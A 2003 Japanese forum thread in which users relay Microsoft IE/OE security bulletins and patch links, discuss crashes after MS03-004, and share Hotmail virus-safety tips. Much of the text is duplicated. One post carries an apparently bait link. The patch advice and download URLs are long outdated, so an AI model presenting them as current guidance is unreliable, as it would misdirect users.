・ Internet Explorer 5.01 Service Pack 3 for Windows 2000
注意:
Internet Explorer 6 の修正プログラムは、
Windows XP 環境にのみ適用可能です。
Internet Explorer 5.01 Service Pack 3 の修正プログラムは、
Windows 2000 環境にのみ適用可能です。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-004ov.asp
・ Internet Explorer 6 Service Pack 1 (WU)
http://download.microsoft.com/download/e/6/e/e6ee3524-714d-4b1f-81c1-5ac1682e9048/q810847.exe
・ Internet Explorer 6 (WU)
http://download.microsoft.com/download/d/5/b/d5b9d2d5-401a-46f9-b8d2-aad6e62f7216/q810847.exe
・ Internet Explorer 5.5 Service Pack 2 (WU)
http://download.microsoft.com/download/2/7/e/27e15564-6035-47de-a42c-c72f35d0492a/q810847.exe
・ Internet Explorer 5.01 Service Pack 3 for Windows 2000 (WU)
http://download.microsoft.com/download/1/0/b/10b3e8d5-a6f6-4b32-b0af-318d73693e77/q810847.exe
注意: 64bit 版の Windows XP をお使いのお客様は、
以下の Internet Explorer 6 Service Pack 1 (64bit) の適用を
お願いします。
・ Internet Explorer 6 Service Pack 1 (64bit) (WU)
http://download.microsoft.com/download/4/3/1/431f40eb-c7ea-4616-ab48-1f9fbba92409/q810847.exe
(WU) の付いている修正プログラムは Windows Update から
インストールすることもできます。
対象となる製品
・ Internet Explorer 6 Service Pack 1
・ Internet Explorer 6 for Windows XP
・ Internet Explorer 5.5 Service Pack 2
・ Internet Explorer 5.01 Service Pack 3 for Windows 2000
注意:
Internet Explorer 6 の修正プログラムは、
Windows XP 環境にのみ適用可能です。
Internet Explorer 5.01 Service Pack 3 の修正プログラムは、
Windows 2000 環境にのみ適用可能です。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-004ov.asp
334 :名無しさん@お腹いっぱい。:03/02/07 00:48
クロスドメインとクロスサイトって同じ意味?
335 :MS03-004:03/02/07 19:21
http://www.microsoft.com/japan/technet/security/bulletin/ms03-004.asp
今回の更新内容
2003 年 1 月 20 日に Windows Update に誤って公開された
Windows NT 4.0 の修正プログラム候補についての 「お詫び」 を追記しました。
大変ご迷惑をお掛けしましたことを深くお詫び申し上げます。
Windows NT 4.0 の環境において、この修正プログラム候補をインストールされ
たお客様は、お手数ですが、2003 年 2 月 6 日に公開した本セキュリティ情報
より、 Internet Explorer 用の修正プログラムをダウンロードし、再適用を
お願いいたします。
お詫び : Windows NT 4.0 の環境において、2003 年 1 月 20 日に
修正プログラム候補が Windows Update に誤って公開されました。お客様には
大変ご迷惑をお掛けしましたことを深くお詫び申し上げます。この
修正プログラムをインストールされたお客様は、お手数ですが、2003 年 2 月
6 日に公開した本セキュリティ情報より、 Internet Explorer 用の
修正プログラムをダウンロードし、再適用をお願いいたします。なお、以前の
修正プログラムをインストールされた環境では、Windows Update に
本修正プログラムが表示されません。現在、正しく検出できるよう
Windows Update を改良しております。
今回の更新内容
2003 年 1 月 20 日に Windows Update に誤って公開された
Windows NT 4.0 の修正プログラム候補についての 「お詫び」 を追記しました。
大変ご迷惑をお掛けしましたことを深くお詫び申し上げます。
Windows NT 4.0 の環境において、この修正プログラム候補をインストールされ
たお客様は、お手数ですが、2003 年 2 月 6 日に公開した本セキュリティ情報
より、 Internet Explorer 用の修正プログラムをダウンロードし、再適用を
お願いいたします。
お詫び : Windows NT 4.0 の環境において、2003 年 1 月 20 日に
修正プログラム候補が Windows Update に誤って公開されました。お客様には
大変ご迷惑をお掛けしましたことを深くお詫び申し上げます。この
修正プログラムをインストールされたお客様は、お手数ですが、2003 年 2 月
6 日に公開した本セキュリティ情報より、 Internet Explorer 用の
修正プログラムをダウンロードし、再適用をお願いいたします。なお、以前の
修正プログラムをインストールされた環境では、Windows Update に
本修正プログラムが表示されません。現在、正しく検出できるよう
Windows Update を改良しております。
336 :名無しさん@お腹いっぱい。:03/02/07 23:35
とあるメーカーからのメルマガを受信したんだけど、
受信トレイにあるそのメールを選択するとOEが固まり落ちます。
削除トレイに移動できなくてちょっと困ってます。。
ウィルスはチェックしたんだけど感染してないようす。
新手の嫌がらせか?
受信トレイにあるそのメールを選択するとOEが固まり落ちます。
削除トレイに移動できなくてちょっと困ってます。。
ウィルスはチェックしたんだけど感染してないようす。
新手の嫌がらせか?
337 :名無しさん@お腹いっぱい。:03/02/08 01:59
OEがだめなら、どのメールソフトがいいの?
なるべくOEと同じように使えるのがいいんだけど。
なるべくOEと同じように使えるのがいいんだけど。
338 :名無しさん@お腹いっぱい。:03/02/08 06:26
フリーでhotmailが使えるのがいい
それさえ出来れば今すぐOEから変えるけど
それさえ出来れば今すぐOEから変えるけど
339 :名無しさん@お腹いっぱい。:03/02/08 09:31
>>338 最新パッチあててればOE最強。
>>339
本当?
最新パッチを当然あててるけど、OEは信用していない
普段はPDAでnPOP(メーラー)使ってヘッダ見て(場合によってはサーバーから削除して)からOEで受信しているけど
バスターを入れているのに神経質過ぎるか
本当?
最新パッチを当然あててるけど、OEは信用していない
普段はPDAでnPOP(メーラー)使ってヘッダ見て(場合によってはサーバーから削除して)からOEで受信しているけど
バスターを入れているのに神経質過ぎるか
341 :名無しさん@お腹いっぱい。:03/02/09 09:24
バスター入れて常駐保護してんなら
洗面所で
「汚れが落ちない、落ちないの・・・どうして、どうして汚れがおちないのぉーーーーーっ」
って絶叫しながら延々3時間ぐらい手を洗ってるようなもん
洗面所で
「汚れが落ちない、落ちないの・・・どうして、どうして汚れがおちないのぉーーーーーっ」
って絶叫しながら延々3時間ぐらい手を洗ってるようなもん
342 :名無しさん@お腹いっぱい。:03/02/09 18:00
www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS03-004ov.asp
>Internet Explorer 6 の修正プログラムは、Windows XP 環境にのみ適用可能です。
これってwin98&ie6.0にあてるパッチはなし?
>Internet Explorer 6 の修正プログラムは、Windows XP 環境にのみ適用可能です。
これってwin98&ie6.0にあてるパッチはなし?
343 :名無しさん@お腹いっぱい。:03/02/09 18:12
>>342
IE6sp1,IE5.5
IE6sp1,IE5.5
「Internet Explorer 6 Service Pack 1」でいいの?
345 :名無しさん@お腹いっぱい。:03/02/09 18:53
>>344 Yes.
346 :名無しさん@お腹いっぱい。:03/02/09 19:25
Internet Explorer 用の累積的な修正プログラム (810847) (MS03-004)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-004.asp
対象プラットフォーム(以下の組み合わせのみ)
Windows 95:IE5.5SP2
Windows 98:IE5.5SP2,IE6.0SP1
Windows ME:IE5.5SP2,IE6.0SP1
Windows NT 4.0 SP6a:IE5.5SP2,IE6.0SP1
Windows 2000 SP3:IE5.01SP3,IE5.5SP2,IE6.0SP1
Windows XPSP1:IE6.0,IE6.0SP1
IEの各バージョンDL先
http://www.microsoft.com/windows/ie_intl/ja/download/default.asp
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-004.asp
対象プラットフォーム(以下の組み合わせのみ)
Windows 95:IE5.5SP2
Windows 98:IE5.5SP2,IE6.0SP1
Windows ME:IE5.5SP2,IE6.0SP1
Windows NT 4.0 SP6a:IE5.5SP2,IE6.0SP1
Windows 2000 SP3:IE5.01SP3,IE5.5SP2,IE6.0SP1
Windows XPSP1:IE6.0,IE6.0SP1
IEの各バージョンDL先
http://www.microsoft.com/windows/ie_intl/ja/download/default.asp
347 :(。・_・。):03/02/09 19:43
∧_∧∩ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
( ´∀`)/<先生!流行ってます。http://homepage3.nifty.com/digikei/ten.html
_ / / / \___________
\⊂ノ ̄ ̄ ̄ ̄\
||\ \
||\|| ̄ ̄ ̄ ̄ ̄||
|| || ̄ ̄ ̄ ̄ ̄||
( ´∀`)/<先生!流行ってます。http://homepage3.nifty.com/digikei/ten.html
_ / / / \___________
\⊂ノ ̄ ̄ ̄ ̄\
||\ \
||\|| ̄ ̄ ̄ ̄ ̄||
|| || ̄ ̄ ̄ ̄ ̄||
348 :cheshire-cat ◆PhCATJR.v6 :03/02/09 22:18
>>347
踏まないよん
踏まないよん
349 :IE最新バージョン情報まとめ:03/02/10 08:40
Internet Explorer 用の累積的な修正プログラム (810847) (MS03-004)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-004.asp
【対策後の確認】
・バージョン画面の「更新バージョン」の行に次項のバージョンと
《MS03-004》を適用して「Q810847」が表示されていればOK.
・インターネットエクスプローラのバージョン確認は、「ヘルプ」「バージョン情報」の「バージョン」で確認。
5.00.3502.1000 Internet Explorer 5.01 Service Pack 3 (Windows 2000 SP3用のみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.0.2600.0000 Internet Explorer 6 (Windows XPのみ但XP SP1を除く)
6.0.2800.1106 Internet Explorer 6 Service Pack 1(Windows 98,ME,NT4.0 SP6a,2000 SP3,XP SP1のみ)
※IEが上記バージョンでない場合は以下で最新IEをダウンロードの上《MS03-004》を適用する(対応OSに注意)。
http://www.microsoft.com/windows/ie_intl/ja/download/default.asp
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-004.asp
【対策後の確認】
・バージョン画面の「更新バージョン」の行に次項のバージョンと
《MS03-004》を適用して「Q810847」が表示されていればOK.
・インターネットエクスプローラのバージョン確認は、「ヘルプ」「バージョン情報」の「バージョン」で確認。
5.00.3502.1000 Internet Explorer 5.01 Service Pack 3 (Windows 2000 SP3用のみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2
6.0.2600.0000 Internet Explorer 6 (Windows XPのみ但XP SP1を除く)
6.0.2800.1106 Internet Explorer 6 Service Pack 1(Windows 98,ME,NT4.0 SP6a,2000 SP3,XP SP1のみ)
※IEが上記バージョンでない場合は以下で最新IEをダウンロードの上《MS03-004》を適用する(対応OSに注意)。
http://www.microsoft.com/windows/ie_intl/ja/download/default.asp
350 :名無しさん@お腹いっぱい。:03/02/10 14:16
>>349
ありがとん
ありがとん
351 :w98&ie6.0.2600...:03/02/10 22:31
Internet Explorer 6 Service Pack 1
Internet Explorer 6
駄目だった、XPじゃねーだろヴォケって言われる
先にsp1入れろってこと?
Internet Explorer 6
駄目だった、XPじゃねーだろヴォケって言われる
先にsp1入れろってこと?
352 :名無しさん@お腹いっぱい。:03/02/11 10:47
353 :名無しさん@お腹いっぱい。:03/02/11 13:27
354 :名無しさん@お腹いっぱい。:03/02/11 20:59
日本語版Operaの最新バージョン「Opera 6.05」に深刻なセキュリティ・ホール
任意のプログラムを実行される,対策は設定ファイルの編集
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030210/2/
Opera6.05 for Windowsにオーバーフローによる脆弱性の可能性
http://jp.opera.com/cgi-bin/supsearch2.cgi?options=index&name=j010
任意のプログラムを実行される,対策は設定ファイルの編集
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030210/2/
Opera6.05 for Windowsにオーバーフローによる脆弱性の可能性
http://jp.opera.com/cgi-bin/supsearch2.cgi?options=index&name=j010
355 :名無しさん@お腹いっぱい。:03/02/11 22:12
>>353
EdMaxは生のメッセージを保存しないから糞。
EdMaxは生のメッセージを保存しないから糞。
356 :MS03-004追加情報:03/02/13 18:41
今回の更新内容
このセキュリティ情報ページを更新し、いくつかのシナリオで、
この修正プログラムにより発生する、セキュリティに関連しない問題を
解決する修正プログラムが入手可能になったことをお知らせしました。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-004.asp
このセキュリティ情報のリリース後に、この修正プログラムにセキュリティには
関連しない問題が確認されました。その問題とは特定の状況で、ユーザー、主に
コンシューマに影響を及ぼす可能性があります。具体的には、この問題により、
購読ベースの Web サイトや MSN 電子メールなど、特定のインターネット Web
サイトに認証できなくなる可能性があります。この問題は解決され、この問題を
修正する修正プログラムは 813951 で提供されています。この修正
プログラムは特定のセキュリティに関連しない問題を修正するものであり、この
セキュリティ情報で説明されている修正プログラムは、後半で説明されている
脆弱性を排除するにあたり、有効でした。また、現在でも有効です。今回
お知らせしている修正プログラムの入手方法に関する詳細など、さらに詳しい情報は
http://www.microsoft.com/windows/ie/downloads/critical/813951/default.asp
(英語情報。ダウンロードに関しては [Japanese] を選択して下さい。) および
「よく寄せられる質問」 をご覧下さい。
このセキュリティ情報ページを更新し、いくつかのシナリオで、
この修正プログラムにより発生する、セキュリティに関連しない問題を
解決する修正プログラムが入手可能になったことをお知らせしました。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-004.asp
このセキュリティ情報のリリース後に、この修正プログラムにセキュリティには
関連しない問題が確認されました。その問題とは特定の状況で、ユーザー、主に
コンシューマに影響を及ぼす可能性があります。具体的には、この問題により、
購読ベースの Web サイトや MSN 電子メールなど、特定のインターネット Web
サイトに認証できなくなる可能性があります。この問題は解決され、この問題を
修正する修正プログラムは 813951 で提供されています。この修正
プログラムは特定のセキュリティに関連しない問題を修正するものであり、この
セキュリティ情報で説明されている修正プログラムは、後半で説明されている
脆弱性を排除するにあたり、有効でした。また、現在でも有効です。今回
お知らせしている修正プログラムの入手方法に関する詳細など、さらに詳しい情報は
http://www.microsoft.com/windows/ie/downloads/critical/813951/default.asp
(英語情報。ダウンロードに関しては [Japanese] を選択して下さい。) および
「よく寄せられる質問」 をご覧下さい。
>>346に間違いがあるので訂正しておきます。
Internet Explorer 用の累積的な修正プログラム (810847) (MS03-004)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ ms03-004.asp
対象プラットフォーム(以下の組み合わせのみ)
Windows 98SE :IE5.5SP2,IE6.0SP1
Windows ME :IE5.5SP2,IE6.0SP1
Windows NT 4.0 SP6a :IE5.5SP2,IE6.0SP1
Windows 2000 SP3 :IE5.01SP3,IE5.5SP2,IE6.0SP1
Windows XP :IE6.0
Windows XP SP1 :IE6.0SP1
IEの各バージョンDL先
http://www.microsoft.com/windows/ie_intl/ja/download/default.asp
Internet Explorer 用の累積的な修正プログラム (810847) (MS03-004)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ ms03-004.asp
対象プラットフォーム(以下の組み合わせのみ)
Windows 98SE :IE5.5SP2,IE6.0SP1
Windows ME :IE5.5SP2,IE6.0SP1
Windows NT 4.0 SP6a :IE5.5SP2,IE6.0SP1
Windows 2000 SP3 :IE5.01SP3,IE5.5SP2,IE6.0SP1
Windows XP :IE6.0
Windows XP SP1 :IE6.0SP1
IEの各バージョンDL先
http://www.microsoft.com/windows/ie_intl/ja/download/default.asp
358 :IE最新バージョン情報まとめ(訂正版):03/02/13 18:56
Internet Explorer 用の累積的な修正プログラム (810847) (MS03-004)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-004.asp
【対策後の確認】
・バージョン画面の「更新バージョン」の行に次項のバージョンと
《MS03-004》を適用して「Q810847」が表示されていればOK.
・インターネットエクスプローラのバージョン確認は、「ヘルプ」「バージョン情報」の「バージョン」で確認。
5.00.3502.1000 Internet Explorer 5.01 Service Pack 3 (Windows 2000 SP3用のみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 (Windows 98SE,ME,NT 4.0 SP6a,2000 SP3)
6.0.2600.0000 Internet Explorer 6 (Windows XPのみ、XP SP1を適用していないものに限る)
6.0.2800.1106 Internet Explorer 6 Service Pack 1(Windows 98SE,ME,NT4.0 SP6a,2000 SP3,XP SP1のみ)
※IEが上記バージョンでない場合は以下で最新IEをダウンロードの上《MS03-004》を適用する(対応OSに注意)。
http://www.microsoft.com/windows/ie_intl/ja/download/default.asp
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms03-004.asp
【対策後の確認】
・バージョン画面の「更新バージョン」の行に次項のバージョンと
《MS03-004》を適用して「Q810847」が表示されていればOK.
・インターネットエクスプローラのバージョン確認は、「ヘルプ」「バージョン情報」の「バージョン」で確認。
5.00.3502.1000 Internet Explorer 5.01 Service Pack 3 (Windows 2000 SP3用のみ)
5.50.4807.2300 Internet Explorer 5.5 Service Pack 2 (Windows 98SE,ME,NT 4.0 SP6a,2000 SP3)
6.0.2600.0000 Internet Explorer 6 (Windows XPのみ、XP SP1を適用していないものに限る)
6.0.2800.1106 Internet Explorer 6 Service Pack 1(Windows 98SE,ME,NT4.0 SP6a,2000 SP3,XP SP1のみ)
※IEが上記バージョンでない場合は以下で最新IEをダウンロードの上《MS03-004》を適用する(対応OSに注意)。
http://www.microsoft.com/windows/ie_intl/ja/download/default.asp
359 :名無しさん@お腹いっぱい。:03/02/13 20:00
>>356のを当てたらバージョン情報にQ813951がついた。
360 :ショック:03/02/13 21:01
昨日システムの復元(約10日前の状態に)をして、その後OE6を開いたら9/1〜復元直前のメールデータが消えてしまいました。
もしかしたら復元操作とは関係無いかもしれませんが、このようにある一定の期間のメールデータが消えてしまった方はいませんか?
McAfeeのウイルススキャンの関係かとも思いましたが、メールのスキャン設定はしてませんでした。
なにかご存知の方アドバイスお願いします。
もしかしたら復元操作とは関係無いかもしれませんが、このようにある一定の期間のメールデータが消えてしまった方はいませんか?
McAfeeのウイルススキャンの関係かとも思いましたが、メールのスキャン設定はしてませんでした。
なにかご存知の方アドバイスお願いします。
361 :名無しさん@お腹いっぱい。:03/02/13 21:19
>>360
板違い。Windows板。
板違い。Windows板。
362 :名無しさん@お腹いっぱい。:03/02/13 22:13
363 :名無しさん@お腹いっぱい。:03/02/13 22:55
364 :名無しさん@お腹いっぱい。:03/02/13 23:52
>>360
そういう時はバックアップとって再現テストしてくれたまえ。
そういう時はバックアップとって再現テストしてくれたまえ。
365 :MS03-004関連:03/02/14 08:40
MS03-004 810487 適用後に OE6 が落ちる、という問題が指摘されている。
Windows板 Outlook Express質問スレッド 2
http://pc2.2ch.net/test/read.cgi/win/1043386737/l50
WinFAQ
ttp://winfaq.jp/cgi-bin/bbs2k/wforum.cgi?mode=allread&no=211295&page=0
ttp://www.ah.wakwak.com/~winfaq/cgi-bin/wforum.cgi?mode=allread&no=236558&page=0
Windows板 Outlook Express質問スレッド 2
http://pc2.2ch.net/test/read.cgi/win/1043386737/l50
WinFAQ
ttp://winfaq.jp/cgi-bin/bbs2k/wforum.cgi?mode=allread&no=211295&page=0
ttp://www.ah.wakwak.com/~winfaq/cgi-bin/wforum.cgi?mode=allread&no=236558&page=0
366 :360:03/02/14 18:11
367 :名無しさん@お腹いっぱい。:03/02/14 18:16
368 :名無しさん@お腹いっぱい。:03/02/14 18:36
>>366
おまい勘違いしている。
http://pc2.2ch.net/test/read.cgi/win/1043386737/81は
おまいに対するレスではないぞ。
あっちでは誰もレスせずに放置されてる。
おまい勘違いしている。
http://pc2.2ch.net/test/read.cgi/win/1043386737/81は
おまいに対するレスではないぞ。
あっちでは誰もレスせずに放置されてる。
369 :名無しさん@お腹いっぱい。:03/02/15 02:26
MS03-004 810487 問題で、MSN hotmail にログインできるように変更したようだ。
再修正パッチしないでも、うまく入れたZO。
再修正パッチしないでも、うまく入れたZO。
370 :名無しさん@お腹いっぱい。:03/02/15 09:49
>>369
MSN hotmail側で対応したってこと?
MSN hotmail側で対応したってこと?
371 :名無しさん@お腹いっぱい。:03/02/18 11:01
Netscapeはもう過去のもの?――開発中止のうわさ
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030217/4/
トランスウエア,Opera 7 for Windowsの日本語パッケージを発売
http://itpro.nikkeibp.co.jp/free/NBY/NEWS/20030217/1/
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030217/4/
トランスウエア,Opera 7 for Windowsの日本語パッケージを発売
http://itpro.nikkeibp.co.jp/free/NBY/NEWS/20030217/1/
372 :MS03-004関連:03/02/18 11:06
>>365
MS03-004 適用後 Outlook Express が正しく動作しない
http://support.microsoft.com/default.aspx?scid=kb;ja;814803
MS03-004 適用後 Outlook Express が正しく動作しない
http://support.microsoft.com/default.aspx?scid=kb;ja;814803
373 :名無しさん@お腹いっぱい。:03/02/18 12:35
現実味を帯びてくる「IE 7.0は出ない」という説
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030217/2/
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20030217/2/
374 :名無しさん@お腹いっぱい。:03/02/18 21:09
まさかとは思うが
メッセンジャーにでも統合されるのか?
メッセンジャーにでも統合されるのか?
375 :名無しさん@お腹いっぱい。:03/02/21 12:32
「パッチ適用のコツ教えます」――MSのセキュリティ担当マネージャが語る
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030220/2/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030220/2/
376 :名無しさん@お腹いっぱい。:03/02/21 22:52
>>375
なんつーか、誰かまともなOSの作り方を教えてあげて・・・(;´Д`)
なんつーか、誰かまともなOSの作り方を教えてあげて・・・(;´Д`)
377 :名無しさん@お腹いっぱい。:03/02/25 16:47
[OE] 長い行のメールを送ると Outlook Express がハングする
http://support.microsoft.com/default.aspx?scid=kb;ja;812110
http://support.microsoft.com/default.aspx?scid=kb;ja;812110
378 :名無しさん@お腹いっぱい。:03/02/26 09:32
IE/Netscape/Operaユーザーは必見,Webブラウザのセキュリティ総点検
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030225/1/
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030225/1/
379 :名無しさん@お腹いっぱい。:03/02/27 08:44
スレ違いスマソ
「MS03-006: Windows Me の 「ヘルプとサポート」 の問題によりコードが実行される (812709)」
http://www.microsoft.com/japan/technet/security/bulletin/ms03-006ov.asp
(緊急) URL ハンドラ (hcp://) に未チェックのバッファがあるため、
バッファのオーバーラン攻撃に悪用される可能性があります。
「MS03-006: Windows Me の 「ヘルプとサポート」 の問題によりコードが実行される (812709)」
http://www.microsoft.com/japan/technet/security/bulletin/ms03-006ov.asp
(緊急) URL ハンドラ (hcp://) に未チェックのバッファがあるため、
バッファのオーバーラン攻撃に悪用される可能性があります。
380 :名無しさん@お腹いっぱい。:03/02/28 12:26
トランスウエアが「Opera 7.02 for Windows 日本語版」を公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030227/2/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030227/2/
381 :名無しさん@お腹いっぱい。:03/03/06 08:54
HotmailとOutlook Expressの組み合わせでウィルス感染する人が多いのでまとめておく。
Hotmailはウィルスチェックをしているとはいうものの、
それはブラウザでHotmailにアクセスした場合に添付ファイルを開く際にチェックするというもので、
メールボックスに入る前に添付ファイルをスキャンするプロバイダのウィルスチェックサービスとは異なる。
さらにOutlook ExpressでHotmailを受信する設定にしているとこのHotmailのウィルスチェック機能は働かず
そのままOutlook Expressのフォルダにウィルスが入ってきてしまう。
またアンチウィルスソフトもメール受信時のスキャンはPOP3のみでHotmailなどのWebメールに対しては行われないので、
この時点でアンチウィルスソフトを常駐させていても反応しない。
ただしアンチウィルスソフトが常駐している場合は、添付ファイルを開くときに反応する。
したがって、Hotmailがウィルススキャンをしているから大丈夫だと誤解して、アンチウィルスソフトを常駐させずに
Outlook ExpressでHotmailを受信する設定にしている場合、ウィルスの添付ファイルは素通りしてくるので、
添付ファイルを開くと感染する。セキュリティホールがある場合には開かなくても感染する。
Hotmailはウィルスチェックをしているとはいうものの、
それはブラウザでHotmailにアクセスした場合に添付ファイルを開く際にチェックするというもので、
メールボックスに入る前に添付ファイルをスキャンするプロバイダのウィルスチェックサービスとは異なる。
さらにOutlook ExpressでHotmailを受信する設定にしているとこのHotmailのウィルスチェック機能は働かず
そのままOutlook Expressのフォルダにウィルスが入ってきてしまう。
またアンチウィルスソフトもメール受信時のスキャンはPOP3のみでHotmailなどのWebメールに対しては行われないので、
この時点でアンチウィルスソフトを常駐させていても反応しない。
ただしアンチウィルスソフトが常駐している場合は、添付ファイルを開くときに反応する。
したがって、Hotmailがウィルススキャンをしているから大丈夫だと誤解して、アンチウィルスソフトを常駐させずに
Outlook ExpressでHotmailを受信する設定にしている場合、ウィルスの添付ファイルは素通りしてくるので、
添付ファイルを開くと感染する。セキュリティホールがある場合には開かなくても感染する。
382 :名無しさん@お腹いっぱい。:03/03/06 08:55
まとめ
1、HotmailはOutlook Expressで受信せずにブラウザで見に行く。
ブラウザもOperaやNetscape等のInternet Explorer以外のものが望ましい。
2、アンチウィルスソフトは必ず導入して常駐させておく。ウィルス定義ファイルは常に最新にしておく。
3、Internet Explorer・Outlook ExpressはWindowsUpdateで常に最新の状態にしておく。
1、HotmailはOutlook Expressで受信せずにブラウザで見に行く。
ブラウザもOperaやNetscape等のInternet Explorer以外のものが望ましい。
2、アンチウィルスソフトは必ず導入して常駐させておく。ウィルス定義ファイルは常に最新にしておく。
3、Internet Explorer・Outlook ExpressはWindowsUpdateで常に最新の状態にしておく。
383 :bloom:03/03/06 09:12
384 :名無しさん@お腹いっぱい。:03/03/07 06:25
>>381
> HotmailとOutlook Expressの組み合わせでウィルス感染する人が多いのでまとめておく。
> Hotmailはウィルスチェックをしているとはいうものの、
> それはブラウザでHotmailにアクセスした場合に添付ファイルを開く際にチェックするというもので、
> メールボックスに入る前に添付ファイルをスキャンするプロバイダのウィルスチェックサービスとは異なる。
> さらにOutlook ExpressでHotmailを受信する設定にしているとこのHotmailのウィルスチェック機能は働かず
> そのままOutlook Expressのフォルダにウィルスが入ってきてしまう。
知らなかった
Hotmailだけの為にOEを使い続けていたけど意味なかったのか
> HotmailとOutlook Expressの組み合わせでウィルス感染する人が多いのでまとめておく。
> Hotmailはウィルスチェックをしているとはいうものの、
> それはブラウザでHotmailにアクセスした場合に添付ファイルを開く際にチェックするというもので、
> メールボックスに入る前に添付ファイルをスキャンするプロバイダのウィルスチェックサービスとは異なる。
> さらにOutlook ExpressでHotmailを受信する設定にしているとこのHotmailのウィルスチェック機能は働かず
> そのままOutlook Expressのフォルダにウィルスが入ってきてしまう。
知らなかった
Hotmailだけの為にOEを使い続けていたけど意味なかったのか
385 :名無しさん@お腹いっぱい。:03/03/07 13:03
>>384
激しく同意。
激しく同意。
386 :名無しさん@お腹いっぱい。:03/03/07 13:08
>>384-385
テストウィルス"eicar"でテストしてみ。OEだとさっくり入ってくるよ。
でもブラウザでHotmailに行くと、添付ファイルをクリックした時に
「感染しています。どうしますか?」みたいなことを聞いてくる。
テストウィルス"eicar"でテストしてみ。OEだとさっくり入ってくるよ。
でもブラウザでHotmailに行くと、添付ファイルをクリックした時に
「感染しています。どうしますか?」みたいなことを聞いてくる。
387 :名無しさん@お腹いっぱい。:03/03/07 17:53
>>381
アンチウィルスソフトって一旦受信したOEのフォルダは
スキャンから除外してるから、
Hotmail経由でOEのフォルダにウィルスが入ってても、
スキャンしたときでも発見されないよね。
んでローカルにウィルスがあるといろいろ危ないよね。
なんかの拍子にアンチウィルスソフトが常駐でなくなったときに
クリックでもしたら大変。
OEでHotmail使うのはやめよう。
アンチウィルスソフトって一旦受信したOEのフォルダは
スキャンから除外してるから、
Hotmail経由でOEのフォルダにウィルスが入ってても、
スキャンしたときでも発見されないよね。
んでローカルにウィルスがあるといろいろ危ないよね。
なんかの拍子にアンチウィルスソフトが常駐でなくなったときに
クリックでもしたら大変。
OEでHotmail使うのはやめよう。
388 :名無しさん@お腹いっぱい。:03/03/11 10:24
OE/IE代替として紹介されているOpera6/7にセキュリティホール。
スレ違いだが、一応紹介しておく。
[Opera 7/6] ダウンロード時の長いファイル名で起こるバッファオーバーフローによる脆弱性
http://opera.rainyblue.org/adv/opera02-dlfnbof.php
スレ違いだが、一応紹介しておく。
[Opera 7/6] ダウンロード時の長いファイル名で起こるバッファオーバーフローによる脆弱性
http://opera.rainyblue.org/adv/opera02-dlfnbof.php
389 :名無しさん@お腹いっぱい。:03/03/13 19:29
保守
390 :名無しさん@お腹いっぱい。:03/03/14 08:45
>>372の不具合まだ修正されないのかなぁ。
長文のメール書いてるとOEが落ちるから、結構ショックだよね。
長文のメール書いてるとOEが落ちるから、結構ショックだよね。
391 :名無しさん@お腹いっぱい。:03/03/14 09:59
[VulnWatch] .MHT Buffer Overflow in Internet Explorer
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0118.html
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0118.html
392 :MS03-007:03/03/18 08:23
Windows コンポーネントの未チェックのバッファによりWebサーバーが侵害される(MS03-007)
http://www.microsoft.com/japan/technet/security/bulletin/ms03-007.asp
このセキュリティ情報の対象となるユーザー :
Microsoft(R) Windows(R) 2000 をご使用のシステム管理者
脆弱性の影響 : 攻撃者の任意のコードが実行される
最大深刻度 : 緊急
推奨する対応策 :
管理者は、直ちにこの修正プログラムをインストールしてください。
影響を受けるソフトウェア :
・Microsoft Windows 2000
修正プログラム :
Microsoft Windows 2000:
この問題に対する日本語版修正プログラムは、次のサイトからダウンロード
できます。
・すべての言語 (NEC PC-9800 シリーズを除く)
(WU)
http://www.microsoft.com/downloads/details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=ja
・NEC PC-9800 シリーズ
(WU)
http://www.microsoft.com/downloads/details.aspx?FamilyID=fbcf9847-d3d6-4493-8dcf-9ba29263c49f&DisplayLang=ja
(WU)このマークの付いている修正プログラムは Windows Update から
インストールすることもできます。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-007.asp
このセキュリティ情報の対象となるユーザー :
Microsoft(R) Windows(R) 2000 をご使用のシステム管理者
脆弱性の影響 : 攻撃者の任意のコードが実行される
最大深刻度 : 緊急
推奨する対応策 :
管理者は、直ちにこの修正プログラムをインストールしてください。
影響を受けるソフトウェア :
・Microsoft Windows 2000
修正プログラム :
Microsoft Windows 2000:
この問題に対する日本語版修正プログラムは、次のサイトからダウンロード
できます。
・すべての言語 (NEC PC-9800 シリーズを除く)
(WU)
